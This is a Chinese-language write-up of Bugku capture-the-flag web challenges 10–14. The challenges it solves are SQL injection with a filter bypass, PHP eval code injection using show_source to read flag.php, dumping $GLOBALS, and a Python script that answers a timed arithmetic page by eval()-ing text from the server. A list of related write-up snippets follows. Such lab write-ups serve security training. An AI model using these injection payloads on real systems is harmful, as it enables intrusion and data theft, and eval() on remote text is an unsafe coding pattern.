bugkuCTF Writeup (Web)10-14
SQL注入1
程式碼審計
先過濾sql關鍵字,再過濾xss(實際上就是刪除一些html標籤),這個順序就很好辦了,把HTML標籤插到sql關鍵字裡面,就繞過了第一個過濾,第二個過濾之後就還原了sql關鍵字
之後就是基本的判斷欄位數、爆資料庫名、爆flag
payload:http://103.238.227.13:10087/?id=1 uni<html>on s<html>elect id,hash fr<html>om sql3.key%23
還要注意的是獲得的欄位值要加上KEY{}再提交
你必須讓他停下
看原始碼,使用js的setTimeout函式自動重新整理,那就禁用js
用瀏覽器禁用當前host的js,然後手動重新整理,直到刷出來flag
PS:說是要在熊貓的那一張停下,出現熊貓是隨機的,所以要刷幾次才行,而且flag是在html裡面隱藏的,得看著原始碼重新整理才行
本地包含
又是程式碼
flag在”flag.php”這個檔案裡,只要按這個樣把flag.php的內容顯示出來就行了
eval執行裡面的程式碼,而且是遞迴的
於是傳入引數hello=show_source(DIR.”/flag.php”)
payload:http://120.24.86.145:8003/?hello=show_source(__DIR__.%22/flag.php%22)
有flag了
變數1
和上面一題差不多,只不過多了一點過濾
有flag in the variable的提示,那就是要看變量了
這裡通過php預定義變數來看flag1.php中載入的變數
傳入引數args=GLOBALS
payload:http://120.24.86.145:8004/index1.php?args=GLOBALS
在輸出的$GLOBALS變數內容裡就有flag
秋名山老司機
兩秒內計算這麼一坨算式,肯定是要寫指令碼的
再刷一下就發現要用post傳入value引數
於是跑python指令碼,值得注意的是傳送http請求的時候要開啟Session支援,不然伺服器不認為兩次請求是同一個電腦發來的
import re
import requests
s = requests.Session()
r = s.get("http://120.24.86.145:8002/qiumingshan/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$' , r.text, re.M | re.S)
d = {
"value": eval(searchObj.group(1))
}
r = s.post("http://120.24.86.145:8002/qiumingshan/", data=d)
print(r.text)
有flag 了
(不要在意亂碼的那些細節)
相關推薦
bugkuCTF Writeup (Web)10-14
SQL注入1 程式碼審計 先過濾sql關鍵字,再過濾xss(實際上就是刪除一些html標籤),這個順序就很好辦了,把HTML標籤插到sql關鍵字裡面,就繞過了第一個過濾,第二個過濾之後就還原
bugkuCTF Writeup (Web)26-29
never give up 看原始碼,有提示<!--1p.html--> 去看1p.html的原始碼 <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!
bugkuCTF Writeup (Web)31-35
各種繞過喲 程式碼審計 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}';
bugkuCTF Writeup (Web)41-44
這是一個神奇的登陸框 登陸框注入 之前注入的分隔符都用的是單引號‘,這道題特立獨行用的是雙引號。 又發現有報錯的回顯,於是報錯注入: 一開始使用的updatexml和extractval
Bugku writeup(web篇)6【域名解析】
【域名解析】 域名解析需要修改本機的hosts檔案,我們可以通過linux來完成題目 通過管理員許可權,開啟hosts檔案 如圖,將域名和ip新增至hosts檔案。 然後直接訪問flag.bugku.com即可得到flag值
軟件工程概論課堂測試一————添加新課程(web)
.get submit use dex sub ava getclass .com title 設計思想 三個文件Class_add.java add.jsp addInput.jsp Class_add.java : 內封裝方法:連接數據庫、向數據庫添加課程信息、判斷
Linux APache (web)安裝
Linux APache web httpd 一,Apache簡介 “Apache HTTP Server”是開源軟件項目的傑出代表,基於標準的HTTP網絡協議提供網頁瀏覽服務,在Web服務器領域中長期保持著超過半數的份額。Apache服務器可以運行在Linux,UNIX,Windows
linux應用與安(web)
linux運維web服務器1、卸載原來已經存在的httpd2、插入光盤:Benet 5.0所需軟件\linux安全及高級應用\rhel-server-6.5-x86_64-dvd.iso3、源碼編譯安裝httpd,下圖為: 1)解包 2)配置4、編譯和安裝下圖為安裝編譯和安裝過程中的狀態,這裏將會等待幾
軟件開發工程師(前端) 10—30w/年
html5 ajax css3 前端 follow 理解 掌握 標準 實踐經驗 軟件開發工程師(前端) 10—30w/年【崗位職責】: 具備3年以上WEB前端工作開發工作經驗。 精通前端的Html5、Css3、Javascript和Ajax技術,熟練掌握jQue
PyQt5-網格布局(QGridLayout)-10
qt5 cat __init__ rom layout push 技術分享 app bubuko 1 #demo_11:網格布局 2 import sys 3 from PyQt5.QtWidgets import QApplication,QWidget,QGr
2018面向物件程式設計(Java)第14周學習指導及要求
2018面向物件程式設計(Java)第14周學習指導及要求(2018.11.29-2018.12.2) 學習目標 (1) 掌握GUI佈局管理器用法; (2) 掌握各類Java Swing元件用途及常用API; 學習資源 1.教材第12章 2.第12章教學課件 3. corejav
201771010102 常惠琢 2018面向物件程式設計(Java)第14周學習總結
1 package gridbag; 2 3 import java.awt.*; 4 5 /** 6 * This class simplifies the use of the GridBagConstraints class. 7 * @version 1.01
Java程式設計思想(二)第14章-型別資訊
目錄: 1. RTTI(Runtime Type Identification)執行階段型別識別 1.1 用途: 為了確定基類指標實際指向的子類的具體型別。——《C++ Primer Plus》 1.2 工作原理: 通過型別轉換運算子回答“是否可以
文獻筆記(5)(2017ISSCC 14.1)
文獻摘自A 2.9TOPS/W Deep Convolutional Neural Network SoC in FD-SOI 28nm for Intelligent Embedded Systems 1 英文縮寫 DCNN: deep convoluti
獲取JAVA(WEB)專案路徑的方法
最近的專案涉及了檔案上傳的功能,不可避免的需要獲得檔案路徑的方法。 下面是關於獲取檔案路徑的一些方法。 對於獲取檔案路徑,在Jsp,Servlet,Java中,有不同的方法。 在java類中: 獲取當前的classpath的絕對URI路徑
如何用ESP8266實現網頁配置(web)
準備工作 準備一個深圳四博智聯科技有限公司的ESP-F 模組。或者四博智聯科技的NODEMCU 當我們拿到ESP-F模組後,可以按照以下接線進行測試: 即 VCC、EN 接 3.3v、GPIO15 GND 接地
學習Caffe(一)Ubuntu 14.04 安裝Caffe+cuda+cudnn+pycaffe+matcaffe
Caffe是一個深度學習框架,本文講闡述如何在linux下安裝GPU加速的caffe。 系統配置是: OS: Ubuntu14.04 CPU: i5-4690 GPU: GTX96
中小型公司節目控制功能元件開發(WEB)
1. 專案需求: (1)按照IOS已上架應用Skylander IPAD版本功能對應開發功能一樣的WEB版 (2)核心功能:節目編輯、節目控制 2. IOS專案部分預覽圖: 3.當前開發頁面為節目控制頁面: (1)需要開發頁面:節目控制頁
設計模式(C#)——10享元模式
推薦閱讀: 我的CSDN 我的部落格園 QQ群:704621321 前言 在軟體開發中,當我們需要對
JasperReport學習筆記4-查詢資料庫生成動態的報表(WEB)
分兩種方法 第一種 1.模版 Xml程式碼 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE jasperReport PUBLIC "//Jaspe